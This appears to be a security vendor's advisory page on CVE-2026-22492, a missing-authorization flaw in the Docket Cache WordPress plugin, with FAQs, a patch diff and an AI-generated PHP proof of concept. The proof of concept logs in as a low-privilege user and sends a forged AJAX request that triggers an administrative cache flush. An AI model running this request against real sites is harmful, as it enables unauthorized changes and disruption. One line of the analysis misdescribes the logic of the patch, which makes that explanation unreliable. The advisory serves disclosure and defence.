What is CVE-2026-22492?

CVE-2026-22492 is a medium severity vulnerability in the Docket Cache plugin for WordPress, affecting versions up to 24.07.04. It allows authenticated users with Subscriber-level access or higher to perform unauthorized actions due to a missing capability check in an AJAX request handler.

How does the vulnerability work?

The vulnerability arises from the absence of a capability check in the `wp_ajax_docket_worker` function. This allows authenticated attackers to send AJAX requests to perform administrative actions without proper authorization, potentially leading to unauthorized changes in cache management.

Who is affected by this vulnerability?

Any WordPress site using the Docket Cache plugin versions 24.07.04 and earlier is affected. This includes sites where users with Subscriber roles or higher can access the AJAX functionality, making it critical for site administrators to check their plugin version.

How can I check if my site is vulnerable?

To determine if your site is vulnerable, check the version of the Docket Cache plugin installed. If it is 24.07.04 or earlier, your site is susceptible to this vulnerability. You can find the plugin version in the WordPress admin under Plugins.

How can I fix or mitigate this issue?

The best way to fix this vulnerability is to update the Docket Cache plugin to version 24.07.05 or later, which includes a patch that adds the necessary capability checks. Regularly updating all plugins is a recommended practice for maintaining site security.

What does the CVSS score of 4.3 indicate?

The CVSS score of 4.3 indicates a medium severity vulnerability. This means that while the risk is not critical, it is significant enough that exploitation could lead to unauthorized actions on the site, necessitating prompt attention from site administrators.

What are the potential risks of exploitation?

If exploited, an attacker could perform administrative functions such as clearing or modifying cache settings, leading to degraded site performance or denial of service. This could also expose sensitive data or disrupt normal operations.

How does the proof of concept demonstrate the issue?

The proof of concept illustrates how an attacker can authenticate as a Subscriber and send a crafted AJAX request to the vulnerable endpoint. It shows the structure of the request required to exploit the vulnerability, highlighting the ease of performing unauthorized actions.

What measures can I take to secure my site beyond updating?

In addition to updating the plugin, consider implementing role-based access controls to limit the capabilities of lower-level users. Regular security audits and monitoring for unusual activity can also help mitigate risks associated with vulnerabilities.

Is there a way to report vulnerabilities like this?

Yes, vulnerabilities should be reported to the plugin developers or through platforms like the WordPress Plugin Security team. Responsible disclosure helps ensure that vulnerabilities are addressed promptly and protects users from exploitation.

What should I do if I cannot update the plugin immediately?

If immediate updating is not possible, consider disabling the Docket Cache plugin until a patch can be applied. Additionally, review user roles and permissions to restrict access to the AJAX functionality until the vulnerability is resolved.

How can I stay informed about vulnerabilities in plugins?

Subscribe to security mailing lists, follow WordPress security blogs, and regularly check the WordPress Plugin Directory for updates. Engaging with the WordPress community can also provide timely information on vulnerabilities and best practices.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : March 18, 2026

CVE-2026-22492: Docket Cache <= 24.07.04 – Missing Authorization (docket-cache)

CVE ID CVE-2026-22492

Plugin docket-cache

Severity Medium (CVSS 4.3)

CWE 862

Vulnerable Version 24.07.04

Patched Version 24.07.05

Disclosed January 6, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-22492:
The Docket Cache WordPress plugin, versions up to and including 24.07.04, contains a missing authorization vulnerability in its AJAX request handler. This flaw allows authenticated attackers with Subscriber-level permissions or higher to execute administrative actions intended only for site administrators. The vulnerability has a CVSS score of 4.3, indicating medium severity.

The root cause is the absence of a capability check in the `wp_ajax_docket_worker` AJAX handler within the `Plugin` class. In the vulnerable code at `docket-cache/includes/src/Plugin.php` lines 1760-1775, the function only validates a security nonce via `check_ajax_referer()` and checks for the existence of a `type` POST parameter. It does not verify whether the current user has the required administrative privileges before processing the request. The function is hooked to the `wp_ajax_docket_worker` action, making it accessible via the standard WordPress AJAX endpoint.

Exploitation requires an authenticated WordPress user account with any role, including the lowest-privilege Subscriber role. An attacker sends a POST request to `/wp-admin/admin-ajax.php` with the `action` parameter set to `docket_worker`. The request must include a valid `token` (nonce) parameter and a `type` parameter specifying the administrative action to perform. The nonce can be obtained from pages accessible to the attacker, such as the plugin’s public-facing interface elements. The payload structure is `action=docket_worker&token=[VALID_NONCE]&type=[ACTION_TYPE]`.

The patch adds a mandatory capability check before processing the AJAX request. In the patched code at lines 1770-1774, the function now calls `current_user_can($cap)` where `$cap` is dynamically set to `manage_network_options` for multisite installations or `manage_options` for single sites. If the check fails, the function sends a JSON error response and exits. The patch also corrects a logical operator in the nonce validation from `&&` to `||` at line 1767, ensuring both conditions must be met. A similar capability check was added to the `admin_enqueue_scripts` callback at lines 1691-1695 to prevent unauthorized script loading.

Successful exploitation allows attackers with minimal permissions to trigger administrative plugin functions. The specific impact depends on the actions available through the `docket_worker` handler, which the diff does not fully reveal. Atomic Edge research indicates this typically includes cache management operations like flushing, preloading, or configuration changes. An attacker could degrade site performance, cause denial of service by clearing critical caches, or manipulate caching behavior to expose sensitive data.

Differential between vulnerable and patched code

Code Diff

--- a/docket-cache/docket-cache.php
+++ b/docket-cache/docket-cache.php
@@ -12,8 +12,8 @@
  * @wordpress-plugin
  * Plugin Name:         Docket Cache
  * Plugin URI:          https://docketcache.com/?utm_source=wp-plugins&utm_campaign=plugin-uri&utm_medium=wp-dash
- * Version:             24.07.04
- * VerPrev:             24.07.03
+ * Version:             24.07.05
+ * VerPrev:             24.07.04
  * Description:         A persistent object cache stored as a plain PHP code, accelerates caching with OPcache backend.
  * GitHub Plugin URI:   https://github.com/nawawi/docket-cache
  * Author:              Nawawi Jamili
--- a/docket-cache/includes/object-cache.php
+++ b/docket-cache/includes/object-cache.php
@@ -3,7 +3,7 @@
  * @wordpress-plugin
  * Plugin Name:         Docket Cache Drop-in
  * Plugin URI:          https://wordpress.org/plugins/docket-cache/
- * Version:             24.07.04
+ * Version:             24.07.05
  * Description:         Object Cache drop-in for Docket Cache.
  * Author:              Nawawi Jamili
  * Author URI:          https://docketcache.com
--- a/docket-cache/includes/src/Crawler.php
+++ b/docket-cache/includes/src/Crawler.php
@@ -14,7 +14,7 @@

 final class Crawler
 {
-    private static $version = '24.07.04';
+    private static $version = '24.07.05';
     public static $send_cookie = false;

     private static function default_args($param = [])
--- a/docket-cache/includes/src/Plugin.php
+++ b/docket-cache/includes/src/Plugin.php
@@ -1688,6 +1688,11 @@
         add_action(
             'admin_enqueue_scripts',
             function ($hook) {
+                $cap = is_multisite() ? 'manage_network_options' : 'manage_options';
+                if (!current_user_can($cap)) {
+                    return;
+                }
+
                 $is_debug = $this->cf()->is_true('WP_DEBUG');
                 $plugin_url = plugin_dir_url($this->file);
                 $version = str_replace('.', '', $this->version()).'xe'.($is_debug ? date('his') : date('yd'));
@@ -1760,11 +1765,17 @@
         add_action(
             'wp_ajax_docket_worker',
             function () {
-                if (!check_ajax_referer('docketcache-token-nonce', 'token', false) && !isset($_POST['type'])) {
+                if (!check_ajax_referer('docketcache-token-nonce', 'token', false) || !isset($_POST['type'])) {
                     wp_send_json_error('Invalid security token sent.');
                     exit;
                 }

+                $cap = is_multisite() ? 'manage_network_options' : 'manage_options';
+                if (!current_user_can($cap)) {
+                    wp_send_json_error('Unauthorized access.');
+                    exit;
+                }
+
                 $type = sanitize_text_field($_POST['type']);

                 if ($this->cx()->validate()) {

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2026-22492 - Docket Cache <= 24.07.04 - Missing Authorization
<?php
/*
 * Proof of Concept for CVE-2026-22492
 * Requires: Valid WordPress subscriber (or higher) credentials and a valid nonce.
 * The nonce ('token') must be obtained from a page the user can access.
 * This script demonstrates the unauthorized AJAX request structure.
 */

$target_url = 'https://vulnerable-site.com/wp-admin/admin-ajax.php';
$username = 'subscriber_user';
$password = 'subscriber_pass';
$nonce = 'abc123def456'; // Must be a valid 'docketcache-token-nonce' for the user

// Step 1: Authenticate to WordPress to get cookies
$ch = curl_init();
curl_setopt_array($ch, [
    CURLOPT_URL => str_replace('/wp-admin/admin-ajax.php', '/wp-login.php', $target_url),
    CURLOPT_POST => true,
    CURLOPT_POSTFIELDS => http_build_query([
        'log' => $username,
        'pwd' => $password,
        'wp-submit' => 'Log In',
        'redirect_to' => str_replace('/wp-admin/admin-ajax.php', '/wp-admin/', $target_url),
        'testcookie' => '1'
    ]),
    CURLOPT_RETURNTRANSFER => true,
    CURLOPT_COOKIEJAR => 'cookies.txt',
    CURLOPT_COOKIEFILE => 'cookies.txt',
    CURLOPT_FOLLOWLOCATION => true,
    CURLOPT_HEADER => true
]);
$response = curl_exec($ch);
curl_close($ch);

// Step 2: Send unauthorized AJAX request to docket_worker endpoint
$ch = curl_init();
curl_setopt_array($ch, [
    CURLOPT_URL => $target_url,
    CURLOPT_POST => true,
    CURLOPT_POSTFIELDS => http_build_query([
        'action' => 'docket_worker',
        'token' => $nonce,
        'type' => 'flush' // Example action type; other types may exist
    ]),
    CURLOPT_RETURNTRANSFER => true,
    CURLOPT_COOKIEFILE => 'cookies.txt',
    CURLOPT_COOKIEJAR => 'cookies.txt'
]);
$ajax_response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);

// Step 3: Output results
if ($http_code === 200 && strpos($ajax_response, 'success') !== false) {
    echo "[SUCCESS] Unauthorized action executed. Response: " . htmlspecialchars($ajax_response);
} else {
    echo "[FAILED] Request completed with HTTP $http_code. Response: " . htmlspecialchars($ajax_response);
}
?>

Frequently Asked Questions

What is CVE-2026-22492?
Understanding the vulnerability
CVE-2026-22492 is a medium severity vulnerability in the Docket Cache plugin for WordPress, affecting versions up to 24.07.04. It allows authenticated users with Subscriber-level access or higher to perform unauthorized actions due to a missing capability check in an AJAX request handler.
How does the vulnerability work?
Mechanics of the exploit
The vulnerability arises from the absence of a capability check in the `wp_ajax_docket_worker` function. This allows authenticated attackers to send AJAX requests to perform administrative actions without proper authorization, potentially leading to unauthorized changes in cache management.
Who is affected by this vulnerability?
Identifying vulnerable installations
Any WordPress site using the Docket Cache plugin versions 24.07.04 and earlier is affected. This includes sites where users with Subscriber roles or higher can access the AJAX functionality, making it critical for site administrators to check their plugin version.
How can I check if my site is vulnerable?
Steps for verification
To determine if your site is vulnerable, check the version of the Docket Cache plugin installed. If it is 24.07.04 or earlier, your site is susceptible to this vulnerability. You can find the plugin version in the WordPress admin under Plugins.
How can I fix or mitigate this issue?
Updating the plugin
The best way to fix this vulnerability is to update the Docket Cache plugin to version 24.07.05 or later, which includes a patch that adds the necessary capability checks. Regularly updating all plugins is a recommended practice for maintaining site security.
What does the CVSS score of 4.3 indicate?
Understanding risk levels
The CVSS score of 4.3 indicates a medium severity vulnerability. This means that while the risk is not critical, it is significant enough that exploitation could lead to unauthorized actions on the site, necessitating prompt attention from site administrators.
What are the potential risks of exploitation?
Impact of the vulnerability
If exploited, an attacker could perform administrative functions such as clearing or modifying cache settings, leading to degraded site performance or denial of service. This could also expose sensitive data or disrupt normal operations.
How does the proof of concept demonstrate the issue?
Analyzing the provided PoC
The proof of concept illustrates how an attacker can authenticate as a Subscriber and send a crafted AJAX request to the vulnerable endpoint. It shows the structure of the request required to exploit the vulnerability, highlighting the ease of performing unauthorized actions.
What measures can I take to secure my site beyond updating?
Additional security practices
In addition to updating the plugin, consider implementing role-based access controls to limit the capabilities of lower-level users. Regular security audits and monitoring for unusual activity can also help mitigate risks associated with vulnerabilities.
Is there a way to report vulnerabilities like this?
Responsible disclosure
Yes, vulnerabilities should be reported to the plugin developers or through platforms like the WordPress Plugin Security team. Responsible disclosure helps ensure that vulnerabilities are addressed promptly and protects users from exploitation.
What should I do if I cannot update the plugin immediately?
Temporary mitigation strategies
If immediate updating is not possible, consider disabling the Docket Cache plugin until a patch can be applied. Additionally, review user roles and permissions to restrict access to the AJAX functionality until the vulnerability is resolved.
How can I stay informed about vulnerabilities in plugins?
Keeping up with security updates
Subscribe to security mailing lists, follow WordPress security blogs, and regularly check the WordPress Plugin Directory for updates. Engaging with the WordPress community can also provide timely information on vulnerabilities and best practices.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations